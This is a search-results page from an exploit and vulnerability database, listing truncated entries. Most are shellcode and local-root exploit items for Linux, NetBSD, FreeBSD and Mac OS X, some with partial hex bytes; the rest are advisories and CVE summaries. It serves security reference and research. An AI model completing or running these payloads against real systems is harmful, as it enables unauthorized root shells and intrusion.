1135 matches found
34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 34 bytes setreudgetuid, getuid & execve/bin/sh shellcode Platform: Linux x86 setreuidgetuid, getuid; execve/bin/sh; gcc -Wl,-z,execstack...
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
No description provided by source. / Linux/x86 setuid0 + execve/bin/sh, /bin/sh, NULL - 31 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // push $0xb \x58 // pop %eax \x52 //...
FreeBSD 4.10/5.x execve() Unaligned Memory Access Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10596/info It is reported that FreeBSD running on the Alpha architecture is susceptible to a denial of service vulnerability in its execve system call. An attacker with local interactive user-level access on an affected...
SGI IRIX 6.2 - day5notifier Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely replaces a number of system...
linux/x86-64 execve(/bin/sh) 52 bytes
No description provided by source. / Exploit Title : linux/x86-64 execve/bin/sh 52 bytes Tested on : Linux iron 2.6.38-8-generic 42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x8664 x8664 x8664 GNU/Linux Date : 03/12/2011 Author : X-h4ck Email : [email protected] Website : http://www.pirate.al Greetz :...
Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...
Linux kernel <= 2.2.18 ptrace/execve Race Condition Vulnerability (2)
No description provided by source. source: http://www.securityfocus.com/bid/2529/info The Linux kernel is the core of all distributions of the Linux Operating System. It was originally written by Linus Torvalds, and is maintained by a community of developers. A problem in the Linux Kernel could...
MTools 3.9.x MFormat Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9746/info It has been reported that mformat is prone to a privilege escalation vulnerability when installed as a setUID application. This issue is due to a design error allowing a user to create any arbitrary files as the...
linux/x86 setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0) 34 bytes
No description provided by source. / linux/x86 setreuidgeteuid,geteuid,execve/bin/sh,0,0 34byte universal shellcode blue9057 [email protected] / int main char shellcode=\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46 \x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68...
netbsd/x86 setreuid(0, 0); execve("/bin//sh", ..., NULL); 30 bytes
No description provided by source. / minervini at neuralnoise dot com c 2005 NetBSD/i386 2.0, setreuid0, 0; execve/bin//sh, ..., NULL; / include sys/types.h include stdio.h include string.h char scode = \x31\xc0 // xor %eax,%eax \x50 // push %eax \x50 // push %eax \x50 // push %eax \x34\x7e // xo...
Linux Kernel 2.6.29 - ptrace_attach() Local Root Race Condition Exploit
No description provided by source. / GNU/Linux kernel 2.6.29 ptraceattach local root race condition exploit. ========================================================================== This is a local root exploit for the 2.6.29 ptraceattach race condition that allows a process to gain elevated...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
No description provided by source. / linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...
Local Glibc shared library (.so) <= 2.11.1 exploit
No description provided by source. Exploit Title: Local Glibc shared library .so exploit Date: 07.04.10 Author: Rh0 [email protected] Software Link: NA Version: = 2.11.1, higher not tested Tested on: Debian stable x86-64, Ubunutu 9.10 x86, Fedora 12 x86 CVE : NA Code : !/bin/sh A lot of applications in...
Xorg 1.4 to 1.11.2 File Permission Change PoC
No description provided by source. / xchmod.c -- Xorg file permission change vulnerability PoC Author: vladz http://vladz.devzero.fr Date: 2011/12/15 Software: www.x.org Version: Xorg 1.4 to 1.11.2 in all configurations. Xorg 1.3 and earlier if built with the USECHMOD preprocessor identifier Test...
97 bytes Linx x86 bind shell port 64533
No description provided by source. include stdio.h include string.h / 1 1 0 I'm Magnefikko member from Inj3ct0r Team & Promhyl Studies Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 by Magnefikko 05.07.2010 [email protected] Promhyl Studies ::...
CVE-2014-3880
CVE-2014-3880 affects the FreeBSD kernel: executing a new image can destroy the calling process’s virtual memory space before all threads terminate, dereferencing an invalid page table pointer and triggering a triple fault leading to a reboot. Affected: FreeBSD 8.4 (before p11), 9.1 (before p14),...
Debian DSA-2952-1 : kfreebsd-9 - security update
Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems : - CVE-2014-1453 A remote, authenticated attacker could cause the NF...
Debian Security Advisory DSA 2952-1 (kfreebsd-9 - security update)
Several vulnerabilities have been discovered in the FreeBSD kernel that may lead to a denial of service or possibly disclosure of kernel memory. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2014-1453 A remote, authenticated attacker could cause the NFS...
DSA-2952-1 kfreebsd-9 - security update
Bulletin has no description...